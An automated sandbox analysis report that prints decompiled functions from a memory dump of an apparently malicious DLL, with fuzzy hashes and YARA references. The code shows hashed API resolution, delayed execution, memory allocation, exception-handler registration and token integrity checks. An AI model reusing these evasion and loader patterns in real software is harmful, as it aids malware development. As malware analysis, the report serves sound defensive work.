Opcode ID: bcd0fefea8faba9c240da1df5ac86b7d19c9c4564be5288060d2eadff5a7e25c
Instruction ID: 6bbf262e0eb26a2baa4013d41c6b2a71d48b3078b2a10cee02db88940361c9c0
Opcode Fuzzy Hash: bcd0fefea8faba9c240da1df5ac86b7d19c9c4564be5288060d2eadff5a7e25c
Instruction Fuzzy Hash: 9822E370A08345AFE735DB24CC40BAF7BA9AF81316F14891DE48A9F191DB34D84ACB53

Uniqueness

Uniqueness Score: -1.00%

Function 73311494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E73311494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E7331F620( &_v72, 0);
				_v60 = 0x22dc1034;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v76, E7331F568( &_v76) + 0x10);
				E7331F558( &_v80, E7331F568( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x853cdd04;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v84, E7331F568(_t325) + 0x10);
				E7331F558( &_v88, E7331F568( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0xb162dc4e;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v92, E7331F568(_t329) + 0x10);
				E7331F558( &_v96, E7331F568( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0xc15ccc53;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v100, E7331F568(_t333) + 0x10);
				E7331F558( &_v104, E7331F568( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xc8fc2de6;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v108, E7331F568(_t337) + 0x10);
				E7331F558( &_v112, E7331F568( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0x7d07f92f;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v116, E7331F568(_t341) + 0x10);
				E7331F558( &_v120, E7331F568( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0xfc7fa539;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v124, E7331F568(_t345) + 0x10);
				E7331F558( &_v128, E7331F568( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x4145240a;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v132, E7331F568(_t349) + 0x10);
				E7331F558( &_v136, E7331F568( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0x2c2324e8;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v140, E7331F568(_t353) + 0x10);
				E7331F558( &_v144, E7331F568( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0xf06b4c6b;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v148, E7331F568(_t357) + 0x10);
				E7331F558( &_v152, E7331F568( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0xa54975b2;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v156, E7331F568(_t361) + 0x10);
				E7331F558( &_v160, E7331F568( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x563e1998;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v164, E7331F568(_t365) + 0x10);
				E7331F558( &_v168, E7331F568( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0xd926c223;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v172, E7331F568(_t369) + 0x10);
				E7331F558( &_v176, E7331F568( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x80febacc;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v180, E7331F568(_t373) + 0x10);
				E7331F558( &_v184, E7331F568( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x98595b64;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v188, E7331F568(_t377) + 0x10);
				E7331F558( &_v192, E7331F568( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x8e3b5f9c;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v196, E7331F568(_t381) + 0x10);
				E7331F558( &_v200, E7331F568( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x9b42cb07;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v204, E7331F568(_t385) + 0x10);
				E7331F558( &_v208, E7331F568( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E7332413C(0xa5eabdf8, _t434);
				E7331F558( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E7331F558( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E7331F558( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E7331F558( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E7331F558( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E7331F558( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E7331F558( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E7331F558( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E7331F558( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E7331F558( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E7331F558( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E7331F558( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E7331F558( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E7331F558( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E7331F558( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E7331F558( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E7331F558( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E73311D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E7331B338( &_v248, _v256, _t481, _v252, _t318);
				E7331F8DC( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0xfb42c037;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v296, E7331F568(_t410) + 0x10);
				E7331F558( &_v300, E7331F568( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0x7082aaf3;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v304, E7331F568(_t414) + 0x10);
				E7331F558( &_v308, E7331F568( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0x1eeb5e35;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v312, E7331F568(_t418) + 0x10);
				E7331F558( &_v316, E7331F568( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0xe856fc47;
				asm("movq [ecx+0x18], xmm0");
				E7331F8C4( &_v320, E7331F568(_t422) + 0x10);
				E7331F558( &_v324, E7331F568( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E7331BAB8(_t154,  *_t480);
				E7331F558( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0"); // executed
				E7331F558( &_v344, 0x10); // executed
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E7331F558( &_v348, "true");
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E7331F558( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E7331F6F0( &_v316);
				return E7331F6F0( &_v356);
			}

0x73311494
0x73311498
0x7331149d
0x733114a3
0x733114ab
0x733114b0
0x733114bc
0x733114c0
0x733114d2
0x733114e8
0x733114f3
0x733114f4
0x733114f5
0x733114f6
0x733114f7
0x733114fa
0x733114fe
0x73311502
0x73311509
0x7331151b
0x73311531
0x7331153c
0x7331153d
0x7331153e
0x7331153f
0x73311540
0x73311543
0x73311547
0x7331154b
0x73311552
0x73311564
0x7331157a
0x73311585
0x73311586
0x73311587
0x73311588
0x73311589
0x7331158c
0x73311590
0x73311594
0x7331159b
0x733115ad
0x733115c3
0x733115ce
0x733115cf
0x733115d0
0x733115d1
0x733115d2
0x733115d5
0x733115d9
0x733115dd
0x733115e4
0x733115f6
0x7331160c
0x73311617
0x73311618
0x73311619
0x7331161a
0x7331161b
0x7331161e
0x73311622
0x73311626
0x7331162d
0x7331163f
0x73311655
0x73311660
0x73311661
0x73311662
0x73311663
0x73311664
0x73311667
0x7331166b
0x7331166f
0x73311676
0x73311688
0x7331169e
0x733116a9
0x733116aa
0x733116ab
0x733116ac
0x733116ad
0x733116b0
0x733116b4
0x733116b8
0x733116bf
0x733116d1
0x733116e7
0x733116f2
0x733116f3
0x733116f4
0x733116f5
0x733116f6
0x733116f9
0x733116fd
0x73311701
0x73311708
0x7331171a
0x73311730
0x7331173b
0x7331173c
0x7331173d
0x7331173e
0x7331173f
0x73311742
0x73311746
0x7331174a
0x73311751
0x73311763
0x73311779
0x73311784
0x73311785
0x73311786
0x73311787
0x73311788
0x7331178b
0x7331178f
0x73311793
0x7331179a
0x733117ac
0x733117c2
0x733117cd
0x733117ce
0x733117cf
0x733117d0
0x733117d1
0x733117d4
0x733117d8
0x733117dc
0x733117e3
0x733117f5
0x7331180b
0x73311816
0x73311817
0x73311818
0x73311819
0x7331181a
0x7331181d
0x73311821
0x73311825
0x7331182c
0x7331183e
0x73311854
0x7331185f
0x73311860
0x73311861
0x73311862
0x73311863
0x73311866
0x7331186a
0x7331186e
0x73311875
0x73311887
0x7331189d
0x733118a8
0x733118a9
0x733118aa
0x733118ab
0x733118ac
0x733118af
0x733118b3
0x733118b7
0x733118be
0x733118d0
0x733118e6
0x733118f1
0x733118f2
0x733118f3
0x733118f4
0x733118f5
0x733118f8
0x733118fc
0x73311900
0x73311907
0x73311919
0x7331192f
0x7331193a
0x7331193b
0x7331193c
0x7331193d
0x7331193e
0x73311941
0x73311945
0x73311949
0x73311950
0x73311962
0x73311978
0x73311983
0x73311984
0x73311985
0x73311986
0x7331198c
0x7331198f
0x73311991
0x7331199c
0x733119a3
0x733119ac
0x733119b4
0x733119bb
0x733119c4
0x733119cc
0x733119d3
0x733119dc
0x733119e4
0x733119eb
0x733119f4
0x733119fc
0x73311a03
0x73311a0c
0x73311a14
0x73311a1b
0x73311a24
0x73311a2c
0x73311a36
0x73311a3f
0x73311a47
0x73311a51
0x73311a5a
0x73311a62
0x73311a6c
0x73311a75
0x73311a7d
0x73311a87
0x73311a90
0x73311a98
0x73311aa2
0x73311aab
0x73311ab3
0x73311abd
0x73311ac6
0x73311ace
0x73311ad8
0x73311ae1
0x73311ae9
0x73311af3
0x73311afc
0x73311b04
0x73311b0e
0x73311b17
0x73311b1f
0x73311b26
0x73311b2f
0x73311b37
0x73311b3e
0x73311b43
0x73311b51
0x73311b55
0x73311b64
0x73311b6d
0x73311b72
0x73311b79
0x73311b7d
0x73311b81
0x73311b88
0x73311b9a
0x73311bb0
0x73311bbb
0x73311bbc
0x73311bbd
0x73311bbe
0x73311bbf
0x73311bc2
0x73311bc6
0x73311bca
0x73311bd1
0x73311be3
0x73311bf9
0x73311c04
0x73311c05
0x73311c06
0x73311c07
0x73311c08
0x73311c0b
0x73311c0f
0x73311c13
0x73311c1a
0x73311c2c
0x73311c42
0x73311c4d
0x73311c4e
0x73311c4f
0x73311c50
0x73311c51
0x73311c54
0x73311c58
0x73311c5c
0x73311c63
0x73311c75
0x73311c8b
0x73311c96
0x73311c97
0x73311c98
0x73311c99
0x73311c9a
0x73311c9d
0x73311ca0
0x73311ca1
0x73311ca2
0x73311ca9
0x73311cac
0x73311cb7
0x73311cbe
0x73311cc7
0x73311ccf
0x73311cd6
0x73311cdf
0x73311ce7
0x73311cee
0x73311cf7
0x73311cff
0x73311d04
0x73311d0d
0x73311d15
0x73311d2a

Strings

$#,, xrefs: 73311701

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $#,
API String ID: 0-2557146312
Opcode ID: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
Instruction ID: 9bcbf9333c389dfe475756844997384b7f9bf8929444e18663eea65c1b391d04
Opcode Fuzzy Hash: faf8bf4f383b9672c02f2385df81a17d360748bba604cd6ce172ee8b62593912
Instruction Fuzzy Hash: 4932B5B2804B069BD719DF20C850AAFB7B0EFA1315F10471DB5992A1A1FF71EA97C741

Uniqueness

Uniqueness Score: -1.00%

Function 7332218C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E7332218C(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E73323A34(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E73322F94(0xa5eabdf8, 0xd48281c0, 0xa5eabdf8, 0xa5eabdf8);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x7332218c
0x73322190
0x733221ac
0x733221af
0x73322192
0x733221a1
0x733221a4
0x733221a4
0x733221bf
0x733221c4
0x733221c8
0x733221d0
0x733221d0
0x733221d4

APIs

NtDelayExecution.NTDLL(00000000,00000000,A5EABDF8,A5EABDF8,FFFFFFFF,FFFFFFFF,733135C3,00000000,00000000,?), ref: 733221D0

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction ID: 17df3668ea01708e58867a32a49da8ec9227ba4677c0e3241215eaf78576b40c
Opcode Fuzzy Hash: e340f986def6f26baa2f9c03e956c8e364c5e46def001a9482b730e7c6c19888
Instruction Fuzzy Hash: 14E09BB060E3016EFB9497294D00F2B7EE89F80212F20862CB555D62C4E630D4018722

Uniqueness

Uniqueness Score: -1.00%

Function 73322790, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E73322790(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E73322F94(0xa5eabdf8, 0xc15ccc53, 0xa5eabdf8, 0xa5eabdf8) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x73322797
0x733227a0
0x733227ae
0x733227d1
0x733227d1
0x733227b0
0x733227c7
0x733227cb
0x00000000
0x733227cd
0x733227cd
0x733227cd
0x733227cb
0x733227d6

APIs

NtAllocateVirtualMemory.NTDLL(A5EABDF8,?,00000000,22DC1034,00000004,00000004,A5EABDF8,A5EABDF8,?,?,73328852,00003000,00000004,000000FF,A5EABDF8,22DC1034), ref: 733227C7

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction ID: eb962fadf28f86f4fa08f090efec0202b605003debe761f6b50c9471cc6be5fe
Opcode Fuzzy Hash: fcb83ea506db4d533a488a570b7e2b2bbaaaa8a6521a140e351edaccfb331de1
Instruction Fuzzy Hash: 3DE0397120D746AFEB19CA29CC14E6BBBFDEF88202F148C2DB496C6550E770D8409722

Uniqueness

Uniqueness Score: -1.00%

Function 73323060, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E73323060(intOrPtr* __ecx) {
				void* _t1;

				_push(E733233D8);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x73323060
0x73323065
0x73323067
0x73323069

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,733233D8,73323050,A5EABDF8,A5EABDF8,?,73312530,00000001), ref: 73323067

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 25e5ddaf04fcc84f3ef2f9a69fd1c1306d27213ac9b9b8eb7aca6f1c092fd9f8
Instruction ID: f711e285c3a3d3f690ab5c0f91f9e34199f15e5421189a78e76b9e61c898fb1c
Opcode Fuzzy Hash: 25e5ddaf04fcc84f3ef2f9a69fd1c1306d27213ac9b9b8eb7aca6f1c092fd9f8
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 73325DF0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 45
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E73325DF0(void* __ecx, void* __eflags, void* _a4, char _a8) {
				long _v12;
				void* __esi;
				long _t9;
				long _t10;
				int _t12;
				void* _t18;
				void** _t19;
				DWORD* _t20;

				_t18 = __ecx;
				_t19 = __ecx + 0xc;
				if(E7331C33C(_t19) == 0) {
					_t2 =  &_a8; // 0x73325ce5
					_v12 =  *_t2;
					if(E73322F8C(0x4bcc7cba, 0x2876e068) == 0) {
						_t9 = 0x7f;
					} else {
						_t12 = ReadFile( *_t19, _a4, _v12, _t20, 0); // executed
						if(_t12 == 0) {
							_t9 = E7332352C(_t18);
						} else {
							_t9 = 0;
						}
					}
					 *((intOrPtr*)(_t18 + 8)) = _t9;
					if(_t9 == 0) {
						_t10 = _v12;
					} else {
						_t10 = 0;
						_v12 = 0;
					}
				} else {
					_t10 = 0;
				}
				return _t10;
			}

0x73325df3
0x73325df5
0x73325e01
0x73325e07
0x73325e0b
0x73325e21
0x73325e40
0x73325e23
0x73325e34
0x73325e38
0x73325e58
0x73325e3a
0x73325e3a
0x73325e3a
0x73325e38
0x73325e41
0x73325e46
0x73325e4f
0x73325e48
0x73325e48
0x73325e4a
0x73325e4a
0x73325e03
0x73325e03
0x73325e03
0x73325e55

APIs

ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,4BCC7CBA,2876E068,?,?,?,73325CE5,00000000,?,00000000,?), ref: 73325E34

Strings

\2s, xrefs: 73325E07

Memory Dump Source

Source File: 00000002.00000002.631853045.0000000073311000.00000020.00020000.sdmp, Offset: 73310000, based on PE: true

Associated: 00000002.00000002.631802830.0000000073310000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631958328.000000007332A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.631970217.000000007332D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.631979356.000000007332F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FileRead
String ID: \2s
API String ID: 2738559852-1787142741
Opcode ID: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction ID: fcf0a7c3b4d6789a8dcd91582d74b5ad9b4a7a5dfd178c33ca79c05cae03bac0
Opcode Fuzzy Hash: 6762ad9e688c98861c5b697065b5bdf6121a2abcf83bb2bb4119fe35680c4d3b
Instruction Fuzzy Hash: 62F081B1208606AFEB619E248C40BEAFBE9AB44152F10482FA89AD2164EA21D6048625

Uniqueness

Uniqueness Score: -1.00%

Function 73321140, Relevance: 3.1, APIs: 2, Instructions: 91
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E73321140(void* __ecx, void* __edi, void* __esi) {
				long _v12;
				void* _v20;
				void* _v24;
				char _v32;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				void* _v64;
				int _t31;
				void* _t33;
				long* _t39;
				intOrPtr* _t46;
				void* _t54;
				void* _t56;
				void* _t58;
				long* _t59;

				_t59 = _t58 - 0x20;
				_t56 = __ecx;
				_v12 = 0;
				_t46 = E73322F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
				if(_t46 != 0) {
					 *_t46(_t56, 8,  &_v12);
				}
				_t39 = _t59;
				 *_t39 = _v12;
				_t39[1] = 1;
				if(E7331C33C(_t39) != 0) {
					L6:
					if(_t59[1] != 0) {
						E7331BC00(_t59);
					}
					return 0;
				} else {
					_t59[6] = 0;
					if(E73322F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t59[6])); // executed
					}
					_t24 = _t59[6];
					if(_t59[6] != 0) {
						E7331F620( &_v32, _t24);
						_t54 = E7331F558( &(_t59[3]), 0);
						if(E73322F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458) == 0) {
							L14:
							E7331F6F0( &_v32);
							goto L6;
						} else {
							_t31 = GetTokenInformation(_v40, 0x19, _t54, _t59[7],  &(_t59[6])); // executed
							if(_t31 == 0) {
								goto L14;
							} else {
								_t33 = E73322F94(0xd0443458, 0x57bf3274, 0xd0443458, 0xd0443458);
								if(_t33 == 0) {
									goto L14;
								} else {
									_push( *_t54);
									asm("int3");
									return _t33;
								}
							}
						}
					} else {
						goto L6;
					}
				}
			}

0x73321142
0x7332114f
0x73321151
0x73321160
0x73321164
0x7332116e
0x7332116e
0x73321174
0x73321177
0x73321179
0x73321184
0x733211be
0x733211c3
0x733211c8
0x733211c8
0x733211d4
0x73321186
0x73321190
0x733211a3
0x733211b4
0x733211b4
0x733211b6
0x733211bc
0x733211da
0x733211ea
0x73321201
0x733212e3
0x733212e7
0x00000000
0x73321207
0x73321217
0x7332121b
0x00000000
0x73321221
0x7332122d
0x73321234
0x00000000
0x7332123a
0x7332123a
0x7332123c
0x7332123d
0x7332123d
0x73321234
0x7332121b
0x00000000
0x00000000
0x00000000
0x733211bc

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,D0443458,D0443458,D0443458,D0443458), ref: 733211B4
